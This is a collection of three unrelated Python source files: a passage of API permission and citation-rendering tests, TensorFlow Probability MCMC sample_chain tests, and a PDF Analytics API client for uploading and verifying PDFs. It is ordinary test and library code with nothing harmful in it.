assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_admin_private_reg(self):
res, registration = self.request(public=False,
registration=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_non_admin_public_reg(self):
res, registration = self.request(registration=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_non_admin_private_reg(self):
res, registration = self.request(public=False,
registration=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_non_contrib_public_reg(self):
res, registration = self.request(registration=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_non_contrib_private_reg(self):
res, registration = self.request(public=False,
registration=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_logged_out_public_reg(self):
res, registration = self.request(registration=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_logged_out_private_reg(self):
res, registration = self.request(public=False,
registration=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
assert_equal(registration.alternative_citations.count(), 1)
class TestGetAlternativeCitations(ApiTestCase):
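"""Exercises GET permissions on alternative citations across user roles, project visibility, and registrations."""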
def request(self, is_admin=False, is_contrib=True, logged_out=False, errors=False, **kwargs):
admin = AuthUserFactory()
if is_admin:
user = admin
else:
# A user is always created so `contrib` can be set below; `logged_out`
# only controls whether the request is sent with auth credentials.
user = AuthUserFactory()
kwargs['contrib'] = user if is_contrib else None
citation, citation_url = set_up_citation_and_project(admin, **kwargs)
if not logged_out:
res = self.app.get(citation_url, auth=user.auth, expect_errors=errors)
else:
res = self.app.get(citation_url, expect_errors=errors)
return res, citation
def test_get_citation_admin_public(self):
res, citation = self.request(is_admin=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_admin_private(self):
res, citation = self.request(public=False,
is_admin=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_admin_public(self):
res, citation = self.request()
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_admin_private(self):
res, citation = self.request(public=False)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_contrib_public(self):
res, citation = self.request(is_contrib=False)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_contrib_private(self):
res, citation = self.request(public=False,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
def test_get_citation_logged_out_public(self):
res, citation = self.request(logged_out=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_logged_out_private(self):
res, citation = self.request(public=False,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
def test_get_citation_admin_not_found_public(self):
res, citation = self.request(is_admin=True,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
def test_get_citation_admin_not_found_private(self):
res, citation = self.request(public=False,
is_admin=True,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
def test_get_citation_non_admin_not_found_public(self):
res, citation = self.request(bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
def test_get_citation_non_admin_not_found_private(self):
res, citation = self.request(public=False,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
def test_get_citation_non_contrib_not_found_public(self):
res, citation = self.request(is_contrib=False,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
def test_get_citation_non_contrib_not_found_private(self):
res, citation = self.request(public=False,
is_contrib=False,
bad=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
def test_get_citation_logged_out_not_found_public(self):
res, citation = self.request(logged_out=True,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
def test_get_citation_logged_out_not_found_private(self):
res, citation = self.request(public=False,
logged_out=True,
bad=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
def test_get_citation_admin_public_reg(self):
res, citation = self.request(registration=True,
is_admin=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_admin_private_reg(self):
res, citation = self.request(public=False,
registration=True,
is_admin=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_admin_public_reg(self):
res, citation = self.request(registration=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_admin_private_reg(self):
res, citation = self.request(public=False,
registration=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_contrib_public_reg(self):
res, citation = self.request(registration=True,
is_contrib=False)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_contrib_private_reg(self):
res, citation = self.request(public=False,
registration=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
def test_get_citation_logged_out_public_reg(self):
res, citation = self.request(registration=True,
logged_out=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_logged_out_private_reg(self):
res, citation = self.request(public=False,
registration=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
class TestManualCitationCorrections(ApiTestCase):
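"""Spot-checks APA, MLA, and Chicago citations rendered for a project against manually built strings."""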
def setUp(self):
super(TestManualCitationCorrections, self).setUp()
self.user = AuthUserFactory()
self.project = ProjectFactory(creator=self.user, is_public=True, title="My Project")
def test_apa_citation(self):
citation = citation_utils.render_citation(self.project, 'apa')
expected_citation = self.user.family_name + ', ' + self.user.given_name_initial + '. (' + \
self.project.date_created.strftime("%Y, %B %-d") + '). ' + self.project.title + \
'. Retrieved from ' + self.project.display_absolute_url
assert_equal(citation, expected_citation)
def test_mla_citation(self):
csl = self.project.csl
citation = citation_utils.render_citation(self.project, 'modern-language-association')
expected_citation = csl['author'][0]['family'] + ', ' + csl['author'][0]['given'] + '. ' + u"\u201c" + csl['title'] + '.' + u"\u201d" + ' ' +\
csl['publisher'] + ', ' + self.project.date_created.strftime("%-d %b. %Y. Web.")
assert_equal(citation, expected_citation)
def test_chicago_citation(self):
csl = self.project.csl
citation = citation_utils.render_citation(self.project, 'chicago-author-date')
expected_citation = csl['author'][0]['family'] + ', ' + csl['author'][0]['given'] + '. ' + \
str(csl['issued']['date-parts'][0][0]) + '. ' + u"\u201c" + csl['title'] + '.' + u"\u201d" + ' ' + \
csl['publisher'] + '. ' + self.project.date_created.strftime("%B %-d") + '. ' + csl['URL'] + '.'
assert_equal(citation, expected_citation)
|
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for MCMC drivers (e.g., `sample_chain`)."""
import collections
import warnings
# Dependency imports
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import samplers
from tensorflow_probability.python.internal import tensorshape_util
from tensorflow_probability.python.internal import test_util
tfb = tfp.bijectors
tfd = tfp.distributions
NUMPY_MODE = False
TestTransitionKernelResults = collections.namedtuple(
'TestTransitionKernelResults', 'counter_1, counter_2')
class TestTransitionKernel(tfp.mcmc.TransitionKernel):
"""Fake deterministic `TransitionKernel` for testing purposes."""
def __init__(self, is_calibrated=True, accepts_seed=True):
self._is_calibrated = is_calibrated
self._accepts_seed = accepts_seed
def one_step(self, current_state, previous_kernel_results, seed=None):
if seed is not None and not self._accepts_seed:
raise TypeError('seed arg not accepted')
return current_state + 1, TestTransitionKernelResults(
counter_1=previous_kernel_results.counter_1 + 1,
counter_2=previous_kernel_results.counter_2 + 2)
def bootstrap_results(self, current_state):
return TestTransitionKernelResults(counter_1=0, counter_2=0)
@property
def is_calibrated(self):
return self._is_calibrated
class RandomTransitionKernel(tfp.mcmc.TransitionKernel):
"""Fake `TransitionKernel` that randomly assigns the next state.
Regardless of the current state, the `one_step` method will always
randomly sample from a Rayleigh Distribution.
"""
def __init__(self, is_calibrated=True, accepts_seed=True):
self._is_calibrated = is_calibrated
self._accepts_seed = accepts_seed
def one_step(self, current_state, previous_kernel_results, seed=None):
if seed is not None and not self._accepts_seed:
raise TypeError('seed arg not accepted')
random_next_state = tfp.random.rayleigh(current_state.shape, seed=seed)
return random_next_state, previous_kernel_results
@property
def is_calibrated(self):
return self._is_calibrated
@test_util.test_all_tf_execution_regimes
class SampleChainTest(test_util.TestCase):
def setUp(self):
self._shape_param = 5.
self._rate_param = 10.
super(SampleChainTest, self).setUp()
@test_util.numpy_disable_gradient_test('HMC')
def testChainWorksCorrelatedMultivariate(self):
dtype = np.float32
true_mean = dtype([0, 0])
true_cov = dtype([[1, 0.5],
[0.5, 1]])
true_cov_chol = np.linalg.cholesky(true_cov)
num_results = 3000
counter = collections.Counter()
def target_log_prob(x, y):
counter['target_calls'] += 1
# Corresponds to unnormalized MVN.
# z = matmul(inv(chol(true_cov)), [x, y] - true_mean)
z = tf.stack([x, y], axis=-1) - true_mean
z = tf.linalg.triangular_solve(true_cov_chol, z[..., tf.newaxis])[..., 0]
return -0.5 * tf.reduce_sum(z**2., axis=-1)
states = tfp.mcmc.sample_chain(
num_results=num_results,
current_state=[dtype(-2), dtype(2)],
kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob,
step_size=[0.5, 0.5],
num_leapfrog_steps=2),
num_burnin_steps=200,
num_steps_between_results=1,
trace_fn=None,
seed=test_util.test_seed())
if not tf.executing_eagerly():
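# In graph mode the Python callable is traced a fixed number of times
# (twice here) rather than executed once per chain step.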
self.assertAllEqual(dict(target_calls=2), counter)
states = tf.stack(states, axis=-1)
self.assertEqual(num_results, tf.compat.dimension_value(states.shape[0]))
sample_mean = tf.reduce_mean(states, axis=0)
x = states - sample_mean
sample_cov = tf.matmul(x, x, transpose_a=True) / dtype(num_results)
sample_mean_, sample_cov_ = self.evaluate([sample_mean, sample_cov])
self.assertAllClose(true_mean, sample_mean_,
atol=0.1, rtol=0.)
self.assertAllClose(true_cov, sample_cov_,
atol=0., rtol=0.175)
def testBasicOperation(self):
kernel = TestTransitionKernel()
samples, kernel_results = tfp.mcmc.sample_chain(
num_results=2, current_state=0, kernel=kernel,
seed=test_util.test_seed())
self.assertAllClose(
[2], tensorshape_util.as_list(samples.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(kernel_results.counter_1.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(kernel_results.counter_2.shape))
samples, kernel_results = self.evaluate([samples, kernel_results])
self.assertAllClose([1, 2], samples)
self.assertAllClose([1, 2], kernel_results.counter_1)
self.assertAllClose([2, 4], kernel_results.counter_2)
def testBurnin(self):
kernel = TestTransitionKernel()
samples, kernel_results = tfp.mcmc.sample_chain(
num_results=2, current_state=0, kernel=kernel, num_burnin_steps=1,
seed=test_util.test_seed())
self.assertAllClose([2], tensorshape_util.as_list(samples.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(kernel_results.counter_1.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(kernel_results.counter_2.shape))
samples, kernel_results = self.evaluate([samples, kernel_results])
self.assertAllClose([2, 3], samples)
self.assertAllClose([2, 3], kernel_results.counter_1)
self.assertAllClose([4, 6], kernel_results.counter_2)
def testThinning(self):
kernel = TestTransitionKernel()
samples, kernel_results = tfp.mcmc.sample_chain(
num_results=2,
current_state=0,
kernel=kernel,
num_steps_between_results=2,
seed=test_util.test_seed())
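# With the deterministic +1 kernel, thinning discards the intermediate
# steps, so stored states land 3 steps apart: [1, 4].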
self.assertAllClose([2], tensorshape_util.as_list(samples.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(kernel_results.counter_1.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(kernel_results.counter_2.shape))
samples, kernel_results = self.evaluate([samples, kernel_results])
self.assertAllClose([1, 4], samples)
self.assertAllClose([1, 4], kernel_results.counter_1)
self.assertAllClose([2, 8], kernel_results.counter_2)
def testDefaultTraceNamedTuple(self):
kernel = TestTransitionKernel()
res = tfp.mcmc.sample_chain(num_results=2, current_state=0, kernel=kernel,
seed=test_util.test_seed())
self.assertAllClose([2], tensorshape_util.as_list(res.all_states.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(res.trace.counter_1.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(res.trace.counter_2.shape))
res = self.evaluate(res)
self.assertAllClose([1, 2], res.all_states)
self.assertAllClose([1, 2], res.trace.counter_1)
self.assertAllClose([2, 4], res.trace.counter_2)
def testNoTraceFn(self):
kernel = TestTransitionKernel()
samples = tfp.mcmc.sample_chain(
num_results=2, current_state=0, kernel=kernel, trace_fn=None,
seed=test_util.test_seed())
self.assertAllClose([2], tensorshape_util.as_list(samples.shape))
samples = self.evaluate(samples)
self.assertAllClose([1, 2], samples)
def testCustomTrace(self):
kernel = TestTransitionKernel()
res = tfp.mcmc.sample_chain(
num_results=2,
current_state=0,
kernel=kernel,
trace_fn=lambda *args: args,
seed=test_util.test_seed())
self.assertAllClose([2], tensorshape_util.as_list(res.all_states.shape))
self.assertAllClose([2], tensorshape_util.as_list(res.trace[0].shape))
self.assertAllClose(
[2], tensorshape_util.as_list(res.trace[1].counter_1.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(res.trace[1].counter_2.shape))
res = self.evaluate(res)
self.assertAllClose([1, 2], res.all_states)
self.assertAllClose([1, 2], res.trace[0])
self.assertAllClose([1, 2], res.trace[1].counter_1)
self.assertAllClose([2, 4], res.trace[1].counter_2)
def testCheckpointing(self):
kernel = TestTransitionKernel()
res = tfp.mcmc.sample_chain(
num_results=2,
current_state=0,
kernel=kernel,
trace_fn=None,
return_final_kernel_results=True,
seed=test_util.test_seed())
self.assertAllClose([2], tensorshape_util.as_list(res.all_states.shape))
self.assertEqual((), res.trace)
self.assertAllClose(
[], tensorshape_util.as_list(res.final_kernel_results.counter_1.shape))
self.assertAllClose(
[], tensorshape_util.as_list(res.final_kernel_results.counter_2.shape))
res = self.evaluate(res)
self.assertAllClose([1, 2], res.all_states)
self.assertAllClose(2, res.final_kernel_results.counter_1)
self.assertAllClose(4, res.final_kernel_results.counter_2)
def testWarningsDefault(self):
with warnings.catch_warnings(record=True) as triggered:
kernel = TestTransitionKernel()
tfp.mcmc.sample_chain(num_results=2, current_state=0, kernel=kernel,
seed=test_util.test_seed())
self.assertTrue(
any('Tracing all kernel results by default is deprecated' in str(
warning.message) for warning in triggered))
def testNoWarningsExplicit(self):
with warnings.catch_warnings(record=True) as triggered:
kernel = TestTransitionKernel()
tfp.mcmc.sample_chain(
num_results=2,
current_state=0,
kernel=kernel,
trace_fn=lambda current_state, kernel_results: kernel_results,
seed=test_util.test_seed())
self.assertFalse(
any('Tracing all kernel results by default is deprecated' in str(
warning.message) for warning in triggered))
def testIsCalibrated(self):
with warnings.catch_warnings(record=True) as triggered:
kernel = TestTransitionKernel(False)
tfp.mcmc.sample_chain(
num_results=2,
current_state=0,
kernel=kernel,
trace_fn=lambda current_state, kernel_results: kernel_results,
seed=test_util.test_seed())
self.assertTrue(
any('supplied `TransitionKernel` is not calibrated.' in str(
warning.message) for warning in triggered))
@test_util.jax_disable_test_missing_functionality('no tf.TensorSpec')
@test_util.numpy_disable_test_missing_functionality('no tf.TensorSpec')
def testReproduceBug159550941(self):
# Reproduction for b/159550941.
input_signature = [tf.TensorSpec([], tf.int32)]
@tf.function(input_signature=input_signature)
def sample(chains):
initial_state = tf.zeros([chains, 1])
def log_prob(x):
return tf.reduce_sum(tfp.distributions.Normal(0, 1).log_prob(x), -1)
kernel = tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=log_prob,
num_leapfrog_steps=3,
step_size=1e-3)
return tfp.mcmc.sample_chain(
num_results=5,
num_burnin_steps=4,
current_state=initial_state,
kernel=kernel,
trace_fn=None)
# Checking that shape inference doesn't fail.
sample(2)
def testSeedReproducibility(self):
first_fake_kernel = RandomTransitionKernel()
second_fake_kernel = RandomTransitionKernel()
seed = samplers.sanitize_seed(test_util.test_seed())
first_final_state = tfp.mcmc.sample_chain(
num_results=5,
current_state=0.,
kernel=first_fake_kernel,
seed=seed,
)
second_final_state = tfp.mcmc.sample_chain(
num_results=5,
current_state=1., # difference should be irrelevant
kernel=second_fake_kernel,
seed=seed,
)
first_final_state, second_final_state = self.evaluate([
first_final_state, second_final_state
])
self.assertAllCloseNested(
first_final_state, second_final_state, rtol=1e-6)
@parameterized.named_parameters(
dict(testcase_name='RWM_tuple',
kernel_from_log_prob=tfp.mcmc.RandomWalkMetropolis,
sample_dtype=(tf.float32,) * 4),
dict(testcase_name='RWM_namedtuple',
kernel_from_log_prob=tfp.mcmc.RandomWalkMetropolis),
dict(testcase_name='HMC_tuple',
kernel_from_log_prob=lambda lp_fn: tfp.mcmc.HamiltonianMonteCarlo( # pylint: disable=g-long-lambda
lp_fn, step_size=0.1, num_leapfrog_steps=10),
skip='HMC requires gradients' if NUMPY_MODE else '',
sample_dtype=(tf.float32,) * 4),
dict(testcase_name='HMC_namedtuple',
kernel_from_log_prob=lambda lp_fn: tfp.mcmc.HamiltonianMonteCarlo( # pylint: disable=g-long-lambda
lp_fn, step_size=0.1, num_leapfrog_steps=10),
skip='HMC requires gradients' if NUMPY_MODE else ''),
dict(testcase_name='NUTS_tuple',
kernel_from_log_prob=lambda lp_fn: tfp.mcmc.NoUTurnSampler( # pylint: disable=g-long-lambda
lp_fn, step_size=0.1),
skip='NUTS requires gradients' if NUMPY_MODE else '',
sample_dtype=(tf.float32,) * 4),
dict(testcase_name='NUTS_namedtuple',
kernel_from_log_prob=lambda lp_fn: tfp.mcmc.NoUTurnSampler( # pylint: disable=g-long-lambda
lp_fn, step_size=0.1),
skip='NUTS requires gradients' if NUMPY_MODE else '')
)
def testStructuredState(self, kernel_from_log_prob, skip='',
**model_kwargs):
if skip:
self.skipTest(skip)
seed_stream = test_util.test_seed_stream()
n = 300
p = 50
x = tf.random.normal([n, p], seed=seed_stream())
def beta_proportion(mu, kappa):
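# Beta reparameterized in terms of a mean-like parameter and concentration kappa.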
return tfd.Beta(concentration0=mu * kappa,
concentration1=(1 - mu) * kappa)
root = tfd.JointDistributionCoroutine.Root
def model_coroutine():
beta = yield root(tfd.Sample(tfd.Normal(0, 1), [p], name='beta'))
alpha = yield root(tfd.Normal(0, 1, name='alpha'))
kappa = yield root(tfd.Gamma(1, 1, name='kappa'))
mu = tf.math.sigmoid(alpha[..., tf.newaxis] +
tf.einsum('...p,np->...n', beta, x))
yield tfd.Independent(beta_proportion(mu, kappa[..., tf.newaxis]),
reinterpreted_batch_ndims=1,
name='prob')
model = tfd.JointDistributionCoroutine(model_coroutine, **model_kwargs)
probs = model.sample(seed=seed_stream())[-1]
pinned = model.experimental_pin(prob=probs)
kernel = kernel_from_log_prob(pinned.unnormalized_log_prob)
nburnin = 5
if not isinstance(kernel, tfp.mcmc.RandomWalkMetropolis):
kernel = tfp.mcmc.SimpleStepSizeAdaptation(
kernel, num_adaptation_steps=nburnin // 2)
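# Sample in unconstrained space; the bijector maps states back to the
# constrained event space of the pinned model.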
kernel = tfp.mcmc.TransformedTransitionKernel(
kernel, pinned.experimental_default_event_space_bijector())
nchains = 4
@tf.function
def sample():
return tfp.mcmc.sample_chain(
1, current_state=pinned.sample_unpinned(nchains, seed=seed_stream()),
kernel=kernel, num_burnin_steps=nburnin, trace_fn=None,
seed=seed_stream())
self.evaluate(sample())
@test_util.jax_disable_test_missing_functionality('PHMC b/175107050')
@test_util.numpy_disable_gradient_test('HMC')
def testStructuredState2(self):
@tfd.JointDistributionCoroutineAutoBatched
def model():
mu = yield tfd.Sample(tfd.Normal(0, 1), [65], name='mu')
sigma = yield tfd.Sample(tfd.Exponential(1.), [65], name='sigma')
beta = yield tfd.Sample(
tfd.Normal(loc=tf.gather(mu, tf.range(436) % 65, axis=-1),
scale=tf.gather(sigma, tf.range(436) % 65, axis=-1)),
4, name='beta')
_ = yield tfd.Multinomial(total_count=100.,
logits=tfb.Pad([[0, 1]])(beta),
name='y')
stream = test_util.test_seed_stream()
pinned = model.experimental_pin(y=model.sample(seed=stream()).y)
struct = pinned.dtype
stddevs = struct._make([
tf.fill([65], .1), tf.fill([65], 1.), tf.fill([436, 4], 10.)])
momentum_dist = tfd.JointDistributionNamedAutoBatched(
struct._make(tfd.Normal(0, 1 / std) for std in stddevs))
kernel = tfp.experimental.mcmc.PreconditionedHamiltonianMonteCarlo(
pinned.unnormalized_log_prob,
step_size=.1, num_leapfrog_steps=10,
momentum_distribution=momentum_dist)
bijector = pinned.experimental_default_event_space_bijector()
kernel = tfp.mcmc.TransformedTransitionKernel(kernel, bijector)
pullback_shape = bijector.inverse_event_shape(pinned.event_shape)
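# Adapt a diagonal mass matrix in the unconstrained (pulled-back) space,
# seeding each running variance with the corresponding inverse event shape.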
kernel = tfp.experimental.mcmc.DiagonalMassMatrixAdaptation(
kernel,
initial_running_variance=struct._make(
tfp.experimental.stats.RunningVariance.from_shape(t)
for t in pullback_shape))
state = bijector(struct._make(
tfd.Uniform(-2., 2.).sample(shp)
for shp in bijector.inverse_event_shape(pinned.event_shape)))
self.evaluate(tfp.mcmc.sample_chain(
3, current_state=state, kernel=kernel, seed=stream()).all_states)
if __name__ == '__main__':
test_util.main()
|
|
#!/usr/bin/env python
"""
---------------------
PDF Analytics Client
---------------------
The PDF Analytics Client is a high-level module for verifying the images and
text of a local PDF file.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import time
from pdf_analytics_client.api_request import APIRequest
class JobClass:
"""Basic PDF analysis Job class """
def __init__(self, id, client):
self.id = id
self.__client = client
def wait_analysis_to_complete(self):
"""Wait for the PDF analysis to complete
After you submit the PDF to PDF Analytics website, the takes some seconds until
it is ready to be used for verification.
:return: If the analysis is completed and returns *True* else if in 20 seconds the job is
not complete, returns *False*
:rtype: bool
"""
count = 0
while self.get_status() == 'In Progress' and count < 10:
time.sleep(3)
count += 1
return self.get_status() != 'In Progress'
def get_status(self):
"""Get the status of the PDF analysis
:return: The analysis status as a string: "In Progress", "Error" or "Complete"
:rtype: str
"""
_, response = self.__client.send_get(uri='job/{id}/get_status/'.format(id=self.id))
return response['status']
def verify_image(self, path, left, top, page, compare_method="pbp", tolerance=0.0):
""" Verify a local image file exists in the PDF
:param path: The absolute or relative path of the locally stored image e.g. '/User/tester/apple.png'
:param left: Distance from the *left* of the page in *points*. Accepts single integer. e.g. 150
:param top: Distance from the *top* of the page in *points*. Accepts single integer. e.g. 200
:param page: Number of page, e.g. an integer 4 or a string 'all', 'last', '1-4'
:param compare_method: Image comparison method
:param tolerance: Comparison tolerance. Default value 0.0. Example: 0.02
:return: The server response as JSON; on failure it contains the error message
:rtype: JSON
"""
request_json = {
'id': int(self.id),
'page': str(page),
'top': int(top),
'left': int(left),
'compare_method': compare_method,
'tolerance': tolerance
}
full_path = os.path.abspath(path)
file_name = os.path.basename(full_path)
with open(full_path, 'rb') as image_file:
files = {'image_file': (file_name, image_file)}
status_code, response = self.__client.send_post(uri='job/verify_image/', data=request_json, ofile=files)
return response
def verify_pdf(self, path, excluded_areas='', tolerance=0.0):
""" Verify a local PDF file with the uploaded job's PDF
:param path: The absolute or relative path of the locally stored PDF file e.g. '/User/tester/report.pdf'
:param excluded_areas: Excluded areas. List field. Example : [
{'left':146, 'top':452, 'width':97, 'height':13,'page':2},
{'left': 414, 'top': 747, 'width': 45, 'height': 16, 'page': 'all'},]
:param tolerance: Comparison tolerance. Default value 0.0. Example: 0.02
:return: The server response as JSON; on failure it contains the error message
:rtype: JSON
"""
request_json = {
'id': int(self.id),
'excluded_areas': excluded_areas,
'tolerance': tolerance
}
full_path = os.path.abspath(path)
file_name = os.path.basename(full_path)
with open(full_path, 'rb') as pdf_file:
files = {'pdf_file': (file_name, pdf_file)}
status_code, response = self.__client.send_post(uri='job/verify_pdf/', data=request_json, ofile=files)
return response
def verify_text(self, text, left, top, page, method='contains'):
""" Verify a text exists in the PDF
:param text: The expected textual content. Accepts string. e.g. 'This is the expected text'
:param left: Distance from the *left* of the page in *points*. Accepts single integer. e.g. 150
:param top: Distance from the *top* of the page in *points*. Accepts single integer. e.g. 200
:param page: Number of page, e.g. an integer 4 or a string 'all', 'last', '1-4'
:param method: Text comparison method
:return: The server response as JSON; on failure it contains the error message
"""
text_comparison_method = {
'contains': 'contains',
'ends_with': 'ends_with',
'starts_with': 'starts_with',
'exact_content': 'exact_content'
}
request_json = {
'id': int(self.id),
'page': str(page),
'expected_text': str(text),
'method': text_comparison_method.get(method),
'top': int(top),
'left': int(left)
}
_, response = self.__client.send_get(uri='job/verify_text/', data=request_json)
return response
def get_item(self, left, top, page, type='any'):
"""Get any item from the PDF (TODO: get figure)
:param left: Distance from the *left* of the page in *points*. Accepts single integer. e.g. 150
:param top: Distance from the *top* of the page in *points*. Accepts single integer. e.g. 200
:param page: Number of page, e.g. 4
:param type: Type of the item. Defaults to 'any'.
:return: A JSON object with the item's information
"""
request_json = {
'id': int(self.id),
'page': int(page),
'type': type,
'top': int(top),
'left': int(left)
}
_, response = self.__client.send_get(uri='find_content/', data=request_json)
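# The response maps a single key to the item's data; unwrap that value.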
return list(response.values())[0]
def get_metadata(self):
"""Get the metadata of the PDF
:return: A JSON object with the metadata of the PDF
"""
_, response = self.__client.send_get(uri='job/{id}/metadata/'.format(id=self.id))
return response
class APIClient:
"""Main API client class"""
def __init__(self, token, url='https://pdf-analytics.com/api/'):
self.client = APIRequest(token=token, url=url)
def create_job(self, local_file, wait_to_complete=True):
"""Create a PDF analysis job
:param local_file: the path of the local PDF file that needs to be uploaded to the server for the analysis
:param wait_to_complete: wait for the PDF analysis to complete. Default value is True.
:return: The JobClass object
"""
file_name = os.path.basename(local_file)
with open(local_file, 'rb') as pdf_file:
files = {'file': (file_name, pdf_file)}
_, response = self.client.send_post(uri='job/upload/', ofile=files)
job_obj = JobClass(id=int(response['id']), client=self.client)
if wait_to_complete:
job_obj.wait_analysis_to_complete()
return job_obj
def get_job(self, job_id):
"""Get PDF analysis job
:param job_id: the PDF analysis job ID
:return: The JobClass object
"""
job_obj = JobClass(id=int(job_id), client=self.client)
return job_obj
def get_account_details(self):
"""Get my account details
:return: a dictionary object with the user's account details
{ 'max_pdf_size_mb': 3,
'daily_max_count': 10,
'today_remaining': 4,
}
"""
_, response = self.client.send_get(uri='account_details/')
return response
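if __name__ == '__main__':
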